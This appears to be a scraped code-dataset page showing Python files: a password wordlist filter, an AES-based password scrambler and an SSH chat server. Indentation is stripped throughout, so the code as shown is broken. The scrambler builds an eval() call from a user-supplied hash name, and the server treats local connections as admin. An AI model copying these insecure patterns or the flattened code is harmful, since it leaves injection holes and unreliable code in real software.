# We remove non utf-8 characters from line, e.g., encoding f*ck up
line = line.decode('utf-8', 'ignore') # bytes to string
# Remove newline (Unix '\n', Mac '\r', Windows '\r\n')
line = line.rstrip('\r\n')
# Check if printable ASCII
if is_ascii(line):
#pass
print("{}".format(line))
else:
# If the line is non-ASCII, we print it to standard error (stderr) stream
#line = line.encode('utf-8', 'ignore') # string to bytes
#sys.stderr.write("Removed: {}\n".format(line))
removed_counter = removed_counter + 1
sys.stderr.write("Done. I removed {} lines/non-ASCII passwords.\n".format(removed_counter))
``` |
{
"source": "84KaliPleXon3/password_scrambler",
"score": 3
} |
#### File: 84KaliPleXon3/password_scrambler/passcrambler.py
```python
import sys
import os
import argparse
import getpass
import base64
import hashlib
from Crypto.Cipher import AES
###
# AES:
pad = lambda s: s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size)
def aes_encrypt( seed, key, raw ):
raw = pad(raw)
iv = seed[0:AES.block_size]
cipher = AES.new( key, AES.MODE_CBC, iv )
return base64.b64encode( iv + cipher.encrypt( raw ) )
###
def scramble( key, func='md5' ):
# Ugly but effective, moreover this is not a webapp so who cares.
# Will raise AttributeError if function is not valid ... auto validation FTW!
return eval( 'hashlib.%s(key).digest()' % func )
###
def convert_to_charset(password, specialchars):
output = ""
i = 0
slen = len(specialchars)
for c in password:
if c.isalnum():
output += c
else:
output += specialchars[i % slen]
i += 1
return output
def main():
try:
parser = argparse.ArgumentParser(description="Password scrambler")
parser.add_argument('--file', dest="file", default=None, help="File used to initialize generation", required=True)
parser.add_argument('--login', dest="login", default=None, help="Login for which you want to use the password", required=True)
parser.add_argument('--special', dest="special", default="_&#", help="Whitelist of special characters, i.e: '_&#'")
parser.add_argument('--length', dest="length", default=30, help="Length of the password, default=30", type=int)
parser.add_argument('--scramble-func', dest="func", default='md5', help="Hashing function to use for input data scrambling, default=md5.\nOther functions can be found on hashlib module documentation.")
args = parser.parse_args()
# first thing first, fail if seed file does not exist
with open( args.file, 'rb' ) as fd:
raw = fd.read()
password = <PASSWORD>()
key = scramble( password, args.func )
vec = scramble( args.login, args.func )
aes_out1 = aes_encrypt( vec, key, raw )
sha_digest = hashlib.sha512(aes_out1).digest()
passlen = len(password) % len(sha_digest)
key2 = sha_digest[passlen: passlen+32]
aes_out2 = aes_encrypt( key, key2, aes_out1 )
start = ord(key[0]) % len(aes_out2)
portion = aes_out2[start:]
result = hashlib.sha512(portion).digest()
longpass = base64.b64encode(result)
longpass = longpass[0:args.length]
longpass = convert_to_charset(longpass, sorted(args.special, reverse=True))
print "---"
print longpass
print "---"
except AttributeError:
print "[ERROR] '%s' is not a valid hashing function." % args.func
except Exception as e:
print "[ERROR] %s" % e
if __name__ == "__main__":
main()
``` |
{
"source": "84KaliPleXon3/pySSHChat",
"score": 3
} |
#### File: pySSHChat/pysshchat/__init__.py
```python
import sys
import argparse
import logging
from pysshchat.store import store
from pysshchat.commands import load_commands
from pysshchat.server import Server
logging.basicConfig(level=logging.WARN)
config = store.config
texts = store.texts
server = Server()
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-H", "--host", help="Hostname (default: 127.0.0.1)", nargs="?")
parser.add_argument("-p", "--port", help="Set port listen (default: 2200)", nargs="?", type=int)
parser.add_argument("-k", "--key", help="Host rsa key path (default auto generated in ~/.ssh/pysshchat)", nargs="?")
parser.add_argument("--password", help="Set password for connect to chat (default non-password)", nargs="?")
parser.add_argument("--config", help="Path config.yaml (see pysshchat/yaml/config.yaml)", nargs="?")
parser.add_argument("--set-title", help="Set title chat", nargs="?")
parser.add_argument("--set-help", help="Set help message", nargs="?")
parser.add_argument("--set-help-file", help="Set help message", nargs="?")
parser.add_argument("--load-text", help="Load texts.yaml on path", nargs="?")
parser.add_argument("--only-simply-mode", dest="only_simply_mode", action="store_true", help="Only line mode (without urwid)")
parser.set_defaults(only_simply_mode=False)
args = parser.parse_args()
load_commands()
if args.host:
config["host"] = args.host
if args.port:
config["port"] = args.port
if args.key:
config["host_key"] = args.key
if args.password:
config["password"] = args.password
if args.set_title:
texts["text"]["title"] = args.set_title
if args.set_help:
texts["text"]["help"] = args.set_help
if args.only_simply_mode:
config["only_simply_mode"] = True
if args.set_help_file:
try:
with open(args.set_help, "r", encoding="utf-8") as file:
texts["text"]["help"] = file.read()
except Exception:
print("Error load %s file" % args.set_help)
sys.exit(0)
if args.config:
store.load_config(args.config)
if args.load_text:
store.load_text(args.load_text)
def start():
server.start()
```
#### File: pySSHChat/pysshchat/libs.py
```python
import threading
def create_thread(func, *args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
def run_thread(func):
def f(*args, **kwargs):
create_thread(func, *args, **kwargs)
return f
```
#### File: pySSHChat/pysshchat/server.py
```python
import re
import sys
import os
import asyncio
import asyncssh
import logging
import hashlib
from pathlib import Path
from pysshchat.user.ui import UI
from pysshchat.user.line import Line
from pysshchat.store import store
logging = logging.getLogger("server")
def fingerprint(key):
fp_plain = hashlib.md5(key).hexdigest()
return ":".join(a + b for a, b in zip(fp_plain[::2], fp_plain[1::2]))
def genkey(path):
if not path:
path = "~/.ssh/pysshchat"
key_path = os.path.expanduser(path)
path = Path(key_path)
if not path.is_file():
Path(path.parent).mkdir(parents=True, exist_ok=True)
key = asyncssh.generate_private_key("ssh-rsa")
key.write_private_key(key_path)
print("Generate host key")
# print("Fingerprint MD5:" + fingerprint(key.get_ssh_public_key()))
return key_path
class MyServer(asyncssh.SSHServer):
def connection_made(self, conn):
self._conn = conn
conn.is_admin = False
def begin_auth(self, username):
admins = store.config.get("admin", False)
if admins:
return bool(admins.get(username, False))
def validate_public_key(self, username, key):
user_key = fingerprint(key.get_ssh_public_key())
admin_key = store.config["admin"].get(username, False)
is_auth = user_key == admin_key
if is_auth and not self._conn.is_admin:
self._conn.is_admin = True
return is_auth
def public_key_auth_supported(self):
return True
def connection_lost(self, exc):
username = self._conn.get_extra_info("username")
user = store.users.get(username, None)
if user:
user.exit()
class Server:
loop = asyncio.get_event_loop()
pid = "/tmp/pysshchat.pid"
def __init__(self):
store.server = self
async def handle_client(self, process):
try:
username = process.channel.get_extra_info("username")
ip, port = process.channel.get_extra_info("peername")
process.is_admin = ip == "127.0.0.1" or process._conn.is_admin
if ip in store.bans.values():
return self.error(process, "Sorry, you are banned.")
size_x, size_y, term_x, term_y = process.get_terminal_size()
simple_mode = process.env.get("SIMPLE", None)
normal_mode = True
if size_x < 60 or size_y < 15 or not len(process.env.items()): # for mobile
normal_mode = False
if simple_mode:
normal_mode = simple_mode != "1"
if store.config.get("only_simply_mode", False):
normal_mode = False
username = re.sub("[^\w]", "", username)
if not len(username):
return self.error(process, "Empty username.")
if len(username) > 10:
return self.error(process, "Max username len 10 chars.")
if username in store.users:
return self.error(process, "This username is used.")
password = store.config.get("password")
if password:
process.stdout.write("Password: ")
try:
process.channel.set_echo(False)
line = await process.stdin.readline()
if line.rstrip("\n") != password:
return self.error(process, "Incorrect password")
except:
process.close()
process.channel.set_echo(False)
process.channel.set_line_mode(False)
if not normal_mode:
Line(username, process, self.loop)
else:
UI(username, process, self.loop)
except Exception as e:
logging.exception(e)
def info(self):
host = store.config.get("host", "127.0.0.1")
port = store.config.get("port", 2200)
key = genkey(store.config.get("host_key", "~/.ssh/pysshchat"))
print("Host key file - %s" % key)
print("Listing %s:%s" % (host, port))
return host, port, key
async def start_server(self):
host, port, key = self.info()
await asyncssh.create_server(MyServer, host, port,
server_host_keys=[key],
process_factory=self.handle_client, line_editor=True)
def error(self, process, text):
process.stdout.write(text + "\r\n")
process.close()
def run(self):
try:
self.loop.run_until_complete(self.start_server())
except (OSError, asyncssh.Error) as exc:
sys.exit("Error starting server: " + str(exc))
try:
self.loop.run_forever()
except KeyboardInterrupt:
tasks = [asyncio.ensure_future(user.wait_closed()) for user in store.users.values()]
if len(tasks):
self.loop.run_until_complete(asyncio.wait(tasks))
except Exception as e:
logging.exception(e)
def start(self):
self.run()
```
#### File: user/ui/palette.py
```python
_palette = [
("divider", "black", "dark cyan", "standout"),
("text", "yellow", "default"),
("bold_text", "light gray", "default", "bold"),
("bold", "bold", ""),
("italics", "italics", ""),
("underline", "underline", ""),
("body", "text"),
("footer", "text"),
("header", "text"),
("list", "black", "light gray"),
("msg_info", "black", "dark cyan", "bold"),
("info", "default", "dark cyan", "bold"),
("title", "bold", "dark cyan", "bold"),
("body", "dark cyan", "", ""),
("msg_danger", "black", "dark red", "bold"),
("default", "", "", "")
]
for id in range(255):
_palette.append(("h" + str(id), "", "", "", "h" + str(id), "default"))
def palette():
return _palette
```
#### File: 84KaliPleXon3/pySSHChat/setup.py
```python
import subprocess
from setuptools import setup, find_packages
from os.path import isdir, join, dirname
PREFIX = "2.1.%s"
def get_version():
d = dirname(__file__)
if isdir(".git"):
version = PREFIX % int(subprocess.check_output(["git", "rev-list", "--all", "--count"]))
with open(join(d, ".version"), "w") as f:
f.write(version)
else:
with open(join(d, ".version"), "r") as f:
version = f.read()
return version
setup(
name="pySSHChat",
packages=find_packages(),
version=get_version(),
description="SSH chat server written on Python3",
author="LexSerest",
author_email="<EMAIL>",
url="https://github.com/LexSerest/pySSHChat/",
keywords=["ssh", "chat", "ssh chat"],
install_requires=[
"pyyaml",
"asyncssh",
"urwid",
"sty",
"aiohttp"
],
include_package_data=True,
license="MIT",
scripts=['bin/pysshchat']
)
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.